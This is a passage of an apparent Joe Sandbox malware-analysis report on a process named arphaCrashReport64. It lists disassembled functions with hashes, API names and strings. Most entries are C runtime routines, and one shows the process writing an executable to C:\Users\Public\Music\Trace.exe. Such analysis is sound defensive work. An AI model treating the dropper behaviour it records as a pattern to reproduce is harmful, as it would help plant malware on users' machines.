                                            • Opcode Fuzzy Hash: 3fc3725ca8a288ac075f2860f78d41a9700cbea2c759c06011dc5ba40e0d3bd0
                                            • Instruction Fuzzy Hash: 4301F521624E4086EB52CF21F858359736AF749B90F062621EF5E077A8CB3CCCDA8708
                                            Function 0000024B6458E600 Relevance: 7.5, APIs: 5, Instructions: 37sleepsynchronizationthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: CloseHandle$ObjectSingleSleepTerminateThreadWait
                                            • String ID:
                                            • API String ID: 3303361366-0
                                            • Opcode ID: f04e112ffcfac24b603780264897768af899bb09a0afb112039c9e615b1336e8
                                            • Instruction ID: 15b562ad799758301823d295b2dc29ac2d4880d450967f104d8aeecc67bea736
                                            • Opcode Fuzzy Hash: f04e112ffcfac24b603780264897768af899bb09a0afb112039c9e615b1336e8
                                            • Instruction Fuzzy Hash: 51111E32A14F80C6EB568B26F858259737AF784B41F454122DBAE43758DF38D48AC305
                                            Function 00007FFDFB8B8380 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd$CallTranslator
                                            • String ID: MOC
                                            • API String ID: 3569367362-624257665
                                            • Opcode ID: 9f2e1f37cc34d99bd3e01c1352f4077eee576076b654561f97ed05d77557bac0
                                            • Instruction ID: d1a5d95b93b13ebc71cfa3b4a176d6be9a4c6a278da2ba818c42f1a312fa4d26
                                            • Opcode Fuzzy Hash: 9f2e1f37cc34d99bd3e01c1352f4077eee576076b654561f97ed05d77557bac0
                                            • Instruction Fuzzy Hash: F2618162719A8395DB20DB24D4A0BAD7760FB80B89F048532DB6D437E9DF78E155CB40
                                            Function 0000024B642A3A64 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 99COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno_getptd_invalid_parameter_noinfoiswctype
                                            • String ID: A$Z
                                            • API String ID: 3686281101-4098844585
                                            • Opcode ID: 28c99b5ff7c153519cc676a4e33103c39524cc50a50e3399b67c0a2bdb34ff0a
                                            • Instruction ID: ec47ae9a5ee05b1ec00e6b04d29881b3e067a593ed95e49f24159b10058540a6
                                            • Opcode Fuzzy Hash: 28c99b5ff7c153519cc676a4e33103c39524cc50a50e3399b67c0a2bdb34ff0a
                                            • Instruction Fuzzy Hash: A3310731924F658BEFA2AB18804D7B6B6D5FB44310FBA065AA8D9C71DDC724C8C8C349
                                            Function 0000024B642B0EC9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd
                                            • String ID: csm
                                            • API String ID: 3186804695-1018135373
                                            • Opcode ID: 3d7b47e0f6bab72505bbf465c5b16e1dcb4b87de87066540f1dd17ecd2e8909f
                                            • Instruction ID: d86abba23d7b54484c2211bb2f01f568a387a7f760ce71b41131c3b2f0f4ab12
                                            • Opcode Fuzzy Hash: 3d7b47e0f6bab72505bbf465c5b16e1dcb4b87de87066540f1dd17ecd2e8909f
                                            • Instruction Fuzzy Hash: 18318530228F048FDF66EF08D445B6973E4FB99314F21452CD48A8359ADBB1F846CB8A
                                            Function 0000024B645A312C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno_fltout2_invalid_parameter_noinfo
                                            • String ID: -
                                            • API String ID: 485257318-2547889144
                                            • Opcode ID: f15782d6f828dd88211d5f1d9bfd9215f81b2dc49f1de837d3fae0d8b09ecb77
                                            • Instruction ID: 9138d03ab27aa57127c3a2bbbde40159adcb90881bcbaddf08d65235ffff3f22
                                            • Opcode Fuzzy Hash: f15782d6f828dd88211d5f1d9bfd9215f81b2dc49f1de837d3fae0d8b09ecb77
                                            • Instruction Fuzzy Hash: DB312C22304E8045EA228F25A80879EB7AAAB45BD8F154117EF9807FDDDF29C489CB04
                                            Function 0000024B645940AC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno_getptd_invalid_parameter_noinfoiswctype
                                            • String ID: A$Z
                                            • API String ID: 3686281101-4098844585
                                            • Opcode ID: e463f11662c860f1c4b49eded7e33c7647cd997a7b129c801fd5d77c378dd932
                                            • Instruction ID: a2da2f2c67789a7fde646d0e1d5e253db4e7c0da78f65574da66d6a34f34ab1d
                                            • Opcode Fuzzy Hash: e463f11662c860f1c4b49eded7e33c7647cd997a7b129c801fd5d77c378dd932
                                            • Instruction Fuzzy Hash: 96210672A18BE182FB725B15904827D77A6E351BA0F9A8112EBE9077DCDB28CC41D308
                                            Function 0000024B645A3728 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfo
                                            • String ID: 1
                                            • API String ID: 2819658684-2212294583
                                            • Opcode ID: 4dcdf7c8606f53b697be72d95b9b2b5693e7dc8786f4527748fd3ec7fc62c8fe
                                            • Instruction ID: d31d02896b0a06d6935284fbf3bd34df5975a01200179dfc3d448d528ab78627
                                            • Opcode Fuzzy Hash: 4dcdf7c8606f53b697be72d95b9b2b5693e7dc8786f4527748fd3ec7fc62c8fe
                                            • Instruction Fuzzy Hash: 6921F6A2219EC085FB5B9F24840C76C6A9E9705B48F5BC452D70606B9BD72ECA88C318
                                            Function 0000024B64593290 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _callnewh_errno$AllocateHeapmallocstd::exception::exception
                                            • String ID: bad allocation
                                            • API String ID: 608171114-2104205924
                                            • Opcode ID: 92ccbdd45ddd4e3c0f64f09dc9e2e3b242226f5de8337ccf23c66fa160172d41
                                            • Instruction ID: e650b1dc0a90482ea67ccb9f5b8b5cad6b1f8a948bd14a280905796285e4fa5c
                                            • Opcode Fuzzy Hash: 92ccbdd45ddd4e3c0f64f09dc9e2e3b242226f5de8337ccf23c66fa160172d41
                                            • Instruction Fuzzy Hash: 1F012D61200F89C1FE5AEF10F85C3A963AEB758380F8A0415D64D47AADEB78C158C708
                                            Function 0000024B6458F2D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandleWrite
                                            • String ID: C:\Users\Public\Music\Trace.exe
                                            • API String ID: 1065093856-248444187
                                            • Opcode ID: 53b92b6cd56feaf15b65a536e72328d75669480d2c299fcd8d3bec73b883eb25
                                            • Instruction ID: eb04042bcbf023f7955b87b06ff7fb49f57a05d907354925cb74ee1b0c4434d3
                                            • Opcode Fuzzy Hash: 53b92b6cd56feaf15b65a536e72328d75669480d2c299fcd8d3bec73b883eb25
                                            • Instruction Fuzzy Hash: A501D632704B8087E7518F65F94825AB365F7887F8F451326EBAA03B9CDBBCC5948B04
                                            Function 00007FFDFB8B2E0C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FFDFB8B2E55,?,?,00000028,00007FFDFB8B1D7D,?,?,00000000,00007FFDFB8B2C88,?,?,00000000,00007FFDFB8B43D5), ref: 00007FFDFB8B2E1B
                                            • GetProcAddress.KERNEL32(?,?,000000FF,00007FFDFB8B2E55,?,?,00000028,00007FFDFB8B1D7D,?,?,00000000,00007FFDFB8B2C88,?,?,00000000,00007FFDFB8B43D5), ref: 00007FFDFB8B2E30
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 1646373207-1276376045
                                            • Opcode ID: eb1dbeb147ccf5ddcb1c0eeb8561c202c44ecf464084eb8da73d3ecb445d589c
                                            • Instruction ID: 15bfe3a30cbbc1dd360d3645992ea99ff96b09861f6f4e6882dd581864f77209
                                            • Opcode Fuzzy Hash: eb1dbeb147ccf5ddcb1c0eeb8561c202c44ecf464084eb8da73d3ecb445d589c
                                            • Instruction Fuzzy Hash: 9AE0EC11B7B60792EF196F71A8A497412906FC9701F489038C82E063F9EE3CA9598A80
                                            Function 0000024B64594F58 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(?,?,000000FF,0000024B64594FA1,?,?,00000028,0000024B64595771,?,?,0000004F00000000,0000024B6459532C,?,?,ceil,0000024B64599B11), ref: 0000024B64594F67
                                            • GetProcAddress.KERNEL32(?,?,000000FF,0000024B64594FA1,?,?,00000028,0000024B64595771,?,?,0000004F00000000,0000024B6459532C,?,?,ceil,0000024B64599B11), ref: 0000024B64594F7C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 1646373207-1276376045
                                            • Opcode ID: 00870a51d3a86f5849b97045870c3183e94da1734dad8510d32b40a3d6ecaddc
                                            • Instruction ID: 261d48c67fa6a5628afe95f3e569162c0f7389ed355874205a709706c91b8ab9
                                            • Opcode Fuzzy Hash: 00870a51d3a86f5849b97045870c3183e94da1734dad8510d32b40a3d6ecaddc
                                            • Instruction Fuzzy Hash: 12E01210B12F8141FE1B9B60A89C324139AAB49780F49142AD51F06398DF3CD9DDC309
                                            Function 0000024B64596894 Relevance: 6.4, APIs: 5, Instructions: 133COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0000024B645952FC: malloc.LIBCMT ref: 0000024B64595327
                                              • Part of subcall function 0000024B645952FC: Sleep.KERNEL32(?,?,ceil,0000024B64599B11,?,?,?,0000024B64599BBB,?,?,00000000,0000024B64594875,?,?,00000000,0000024B6459492C), ref: 0000024B6459533A
                                            • free.LIBCMT ref: 0000024B645969C0
                                            • free.LIBCMT ref: 0000024B645969DC
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$Sleepmalloc
                                            • String ID:
                                            • API String ID: 1995388493-0
                                            • Opcode ID: 39ce9d77a3e790452788de6fa24d85144c2e1ef8362bd983176990c83889e96e
                                            • Instruction ID: b53898cf114433ccb44180d0c43b3ed2e0714eb60c515efb7a0ba60aa9e8e4b5
                                            • Opcode Fuzzy Hash: 39ce9d77a3e790452788de6fa24d85144c2e1ef8362bd983176990c83889e96e
                                            • Instruction Fuzzy Hash: 8351AC32300F84A3EB16DF16E85839933A9F744B94F494429DF4D47B99DF38D9698348
                                            Function 0000024B64599DC0 Relevance: 6.2, APIs: 4, Instructions: 159COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
                                            • String ID:
                                            • API String ID: 27599310-0
                                            • Opcode ID: f2f1d13161b385cc8ebcb920853fb25681289a066f8d3884ebbe5b2d4e1b5b2a
                                            • Instruction ID: e206887f0cae2baa77c2c30a875c7a92a112b99cf78a3d170e2fbefbce9420b6
                                            • Opcode Fuzzy Hash: f2f1d13161b385cc8ebcb920853fb25681289a066f8d3884ebbe5b2d4e1b5b2a
                                            • Instruction Fuzzy Hash: 2451A132604EC5CAFA6B9F15A44C37AB3AFE784744F264416EB5A0279CDB39D845C30A
                                            Function 0000024B642B0AFC Relevance: 6.2, APIs: 4, Instructions: 154COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd$BaseImage
                                            • String ID:
                                            • API String ID: 2482573191-0
                                            • Opcode ID: af5f9acc29257a75163b341382d3d9079731c94abf06afe1f914a7fc080a4b22
                                            • Instruction ID: 802f960bbc1dd63637f8b9962d3eb9b97328b94e3725f5f61cfe4853b3eb36bc
                                            • Opcode Fuzzy Hash: af5f9acc29257a75163b341382d3d9079731c94abf06afe1f914a7fc080a4b22
                                            • Instruction Fuzzy Hash: 3C41D931135E0449EB1B7B68854E7F972D8FB4631CF3645AED045831EFEBB0D8828A49
                                            Function 0000024B645A2EBC Relevance: 6.1, APIs: 4, Instructions: 115COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno_invalid_parameter_noinfo$_getptd
                                            • String ID:
                                            • API String ID: 1297830140-0
                                            • Opcode ID: 39ffee8ed169c10c927c11aeeb2b352ecded053acf8c5715cdcb3c1c0df44ad3
                                            • Instruction ID: 244d7af2e7af98c9f58fe27cc3c8acce8c940ba25cd53dad6d15ef7ace726802
                                            • Opcode Fuzzy Hash: 39ffee8ed169c10c927c11aeeb2b352ecded053acf8c5715cdcb3c1c0df44ad3
                                            • Instruction Fuzzy Hash: BD41E922214FC086E756DF15D18D3AD7BAAF744BD0F468122EB4947B9ACF38C489C709
                                            Function 0000024B642AE7B4 Relevance: 6.1, APIs: 4, Instructions: 115COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2819658684-0
                                            • Opcode ID: ee74e047b5e6401e973330e134ad64bd7e3ff96d8a482232bd7c46c214a6dde7
                                            • Instruction ID: 6109e6009b685f764a5594d7278263f1cf1f624be9c504a025410658102fce7b
                                            • Opcode Fuzzy Hash: ee74e047b5e6401e973330e134ad64bd7e3ff96d8a482232bd7c46c214a6dde7
                                            • Instruction Fuzzy Hash: A7313C20668F854AEF0E562C548C33977C9DB65301F3601BED946C72EFDA61C88E825A
                                            Function 0000024B64591B40 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Code$ErrorLastmallocrealloc
                                            • String ID:
                                            • API String ID: 797104909-0
                                            • Opcode ID: a80c1a447f23a93d993543f1d2932430f74ef1f993dbf219c17908ed45751a1a
                                            • Instruction ID: ac17b0dff1f72df46b6c7e1d00233c20d1f519b6fbbc08f99c0225096f53d00b
                                            • Opcode Fuzzy Hash: a80c1a447f23a93d993543f1d2932430f74ef1f993dbf219c17908ed45751a1a
                                            • Instruction Fuzzy Hash: 75418F32705B8487EB618F16F44835AB7AAF788B98F094025DF4E47B58DF38D491C704
                                            Function 00007FFDFB8B7AD4 Relevance: 6.1, APIs: 4, Instructions: 107COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd$BaseImage
                                            • String ID:
                                            • API String ID: 2482573191-0
                                            • Opcode ID: e059025c964b6926d9780043dba5393845ee502628fbb7cc97ca0f30293eeaf8
                                            • Instruction ID: c27a0bfa302951e1745e615e50dfbc98db1a689c6945ca477f949ddebf1d706a
                                            • Opcode Fuzzy Hash: e059025c964b6926d9780043dba5393845ee502628fbb7cc97ca0f30293eeaf8
                                            • Instruction Fuzzy Hash: 9D41C626B2A70381EB24AB35D4619BD7790AFC4B95F55C132DA2D437F6CE3CE4818E80
                                            Function 0000024B645A1144 Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd$BaseImage_amsg_exit
                                            • String ID:
                                            • API String ID: 2306399499-0
                                            • Opcode ID: 703c5aec7916f61180cc558bb920cebf4870003ac86070bf15e71824dc0a9ab6
                                            • Instruction ID: 85b44d625445929ff0dd03db748a4ec0a217baaad2d89da14c0b026193931523
                                            • Opcode Fuzzy Hash: 703c5aec7916f61180cc558bb920cebf4870003ac86070bf15e71824dc0a9ab6
                                            • Instruction Fuzzy Hash: 9241AB22200E4581EAA39B55D4893AD6B9AAB82FD8F578113DE1D477E6DB34C4CAC704
                                            Function 0000024B642A2A74 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno_getptd_invalid_parameter_noinfofree
                                            • String ID:
                                            • API String ID: 4053972703-0
                                            • Opcode ID: 23713fb59b6591edd0cf875b9b1ad7fa6c685f6b4e7a37dd8d801b22c82a6414
                                            • Instruction ID: bba06c51cfd31ea2bbc9813e7374437e3902d8090f3c1bacc6963091d13779a4
                                            • Opcode Fuzzy Hash: 23713fb59b6591edd0cf875b9b1ad7fa6c685f6b4e7a37dd8d801b22c82a6414
                                            • Instruction Fuzzy Hash: 2821FD30218F094FEB45FF69944E769B7D4EB94310F21052EEC4DC33AADB60D8888796
                                            Function 0000024B6459EDFC Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2819658684-0
                                            • Opcode ID: 790efa823095b8eeed1eb6360597683e311984ac49e55dee3d5209659601771b
                                            • Instruction ID: fea89d429bad73b93f2c8336d707be44fcfd5d2cc6521397bbc7516f667c2594
                                            • Opcode Fuzzy Hash: 790efa823095b8eeed1eb6360597683e311984ac49e55dee3d5209659601771b
                                            • Instruction Fuzzy Hash: 17214622708BC2CAFB578A74D45839E2B8BF359380F1B8022D746877CBD775C84A8709
                                            Function 0000024B645947F4 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: CriticalDeleteSection$Freefree
                                            • String ID:
                                            • API String ID: 1250194111-0
                                            • Opcode ID: 66e45fb4ed4c7c46c8d59f0427f6f79e842585fe759810a90be61511a68586aa
                                            • Instruction ID: a6dbbb7b96a792905700ba216776c9512020b1255dcac2ab221de052cc5f354d
                                            • Opcode Fuzzy Hash: 66e45fb4ed4c7c46c8d59f0427f6f79e842585fe759810a90be61511a68586aa
                                            • Instruction Fuzzy Hash: 37119131A05EC0CBFB678F11F85831973AAE755BA4F5E4611DB6A023ACCB38C895C709
                                            Function 0000024B64595B2C Relevance: 6.0, APIs: 4, Instructions: 45COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _amsg_exit$_getptd_lockfree
                                            • String ID:
                                            • API String ID: 2148533958-0
                                            • Opcode ID: 2d48e3d70f214aa4afb2f177af8117296f37c19805a75fb751cec93a5421d43b
